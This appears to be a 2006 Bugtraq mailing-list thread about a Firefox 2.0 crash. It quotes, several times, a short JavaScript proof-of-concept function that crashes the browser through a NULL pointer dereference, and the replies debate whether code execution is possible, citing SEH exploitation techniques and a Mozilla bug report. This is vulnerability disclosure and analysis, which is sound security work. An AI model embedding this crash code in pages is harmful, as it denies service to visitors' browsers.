Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
Also crashes Seamonkey 1.1b on Suse 10.1 > > > New Flaw in Firefox 2.0: DoS and possible remote code execution > > PoC here: http://werterxyz.altervista.org/Firefox2Range.htm > > > function do_crash() { var > range; > > range = document.createRange(); > range.selectNode(document.firstChild); > range.createContextualFragment('<span></span>'); > } > > > > Good bye Firefox! > > > -- "Ein Herz für Kinder" - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de Unser Dankeschön: Ihr Name auf dem Segel der 1. deutschen America's Cup-Yacht!
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
[EMAIL PROTECTED] schrieb: New Flaw in Firefox 2.0: DoS and possible remote code execution PoC here: http://werterxyz.altervista.org/Firefox2Range.htm function do_crash() { var range; range = document.createRange(); range.selectNode(document.firstChild); range.createContextualFragment('<span></span>'); } Good bye Firefox! hi! that works also under firefox v1.5.0.7. regards jan
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
3APA3A a écrit : Dear [EMAIL PROTECTED], NULL pointer dereference is not exploitable to code execution by itself. Hi, you should be interested by this http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html + a little tool https://www.securinfos.info/outils-securite-hacking/uSEH.rar /JA
Re[2]: New Flaw in Firefox 2.0: DoS and possible remote code execution
Dear Jerome Athias, I said NULL pointer is not exploitable _by itself_. Ability to control unhandled exception filter is different vulnerability. NULL pointer in this case is not exploitation vector, it's only used to initiate attack. --Thursday, November 2, 2006, 10:01:19 PM, you wrote to [EMAIL PROTECTED]: JA> 3APA3A a écrit : >> Dear [EMAIL PROTECTED], >> >> NULL pointer dereference is not exploitable to code execution by itself. >> >> JA> Hi, JA> you should be interested by this JA> http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html JA> + a little tool JA> https://www.securinfos.info/outils-securite-hacking/uSEH.rar JA> /JA -- ~/ZARAZA Íåïðèÿòíîñòè íà÷íóòñÿ â âîñåìü. (Òâåí)
Re[3]: New Flaw in Firefox 2.0: DoS and possible remote code execution
Dear [EMAIL PROTECTED], NULL pointer dereference is not exploitable to code execution by itself. Please read carefully original Michal Zalewski post on the issue you are pointing http://securitytracker.com/alerts/2006/Apr/1016001.html issue mentioned is not NULL pointer, but NULL+offset dereference where offset is believed to be controlled: -=-=-=-=- start quote Michal Zalewski =-=-=-=- ...this will (usually) cause a NULL pointer + fixed offset (eax+0x28) dereference in mshtml.dll, the pointer being read from allocated but still zeroed memory region. The aforementioned condition is not exploitable, but padding the page with preceeding OBJECT tag (and other tags), increasing the number of nested OBJECTs, and most importantly, adding bogus 'type=' parameters of various length to the final sequence of OBJECTs, will cause that dereference to become non-NULL on many installations; -=-=-=-=- end quote =-=-=-=- --Tuesday, October 31, 2006, 11:00:00 PM, you wrote to bugtraq@securityfocus.com: xgc> When you have a NULL pointer dereference a code execution is xgc> also possible, so you can't exclude it at all. xgc> For example in this old flaw: xgc> http://securitytracker.com/alerts/2006/Apr/1016001.html xgc> "The browser does not properly process certain combinations xgc> of nested OBJECT tags. A remote user can create specially crafted xgc> HTML that, when loaded by the target user, will trigger a NULL xgc> pointer dereference and cause the target user's browser to crash or xgc> execute arbitrary code." -- ~/ZARAZA http://www.security.nnov.ru/
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
[EMAIL PROTECTED] wrote: > When you have a NULL pointer dereference a code execution is also possible, > so you can't exclude it at all. > For example in this old flaw: > http://securitytracker.com/alerts/2006/Apr/1016001.html In that example there was a way to influence the crash so that it was not null. The Metasploit blog previously reported on a way to use a null dereference crash to trigger a vulnerability in the windows SEH to run code (since fixed, and not exploitable via Firefox as far as anyone can tell). Neither of those conditions apply here, it's just a null dereference. In a debug build you get ###!!! ASSERTION: Parsing didn't create a parser context?: 'mParserContext', file c:/dev/ff2/mozilla/parser/htmlparser/src/nsParser.cpp, line 1882 This bug appears to have been fixed in the code that will become Firefox 3. This crash is being tracked at https://bugzilla.mozilla.org/show_bug.cgi?id=358797
Re: Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
When you have a NULL pointer dereference a code execution is also possible, so you can't exclude it at all. For example in this old flaw: http://securitytracker.com/alerts/2006/Apr/1016001.html "The browser does not properly process certain combinations of nested OBJECT tags. A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a NULL pointer dereference and cause the target user's browser to crash or execute arbitrary code."
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
> New Flaw in Firefox 2.0: DoS and possible remote code execution > > PoC here: http://werterxyz.altervista.org/Firefox2Range.htm > This looks like a NULL pointer dereference in my debugger. Do you have evidence to call this remote code execution? -- JB
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
Firefox 1.5.0.7 is also vulnerable (to DoS at least). On Tue, 2006-10-31 at 09:24 +, [EMAIL PROTECTED] wrote: > New Flaw in Firefox 2.0: DoS and possible remote code execution > > PoC here: http://werterxyz.altervista.org/Firefox2Range.htm > > > > > > function do_crash() > { > var range; > > range = document.createRange(); > range.selectNode(document.firstChild); > range.createContextualFragment('<span></span>'); > } > > > > Good bye Firefox! > > signature.asc Description: This is a digitally signed message part
New Flaw in Firefox 2.0: DoS and possible remote code execution
New Flaw in Firefox 2.0: DoS and possible remote code execution PoC here: http://werterxyz.altervista.org/Firefox2Range.htm function do_crash() { var range; range = document.createRange(); range.selectNode(document.firstChild); range.createContextualFragment('<span></span>'); } Good bye Firefox!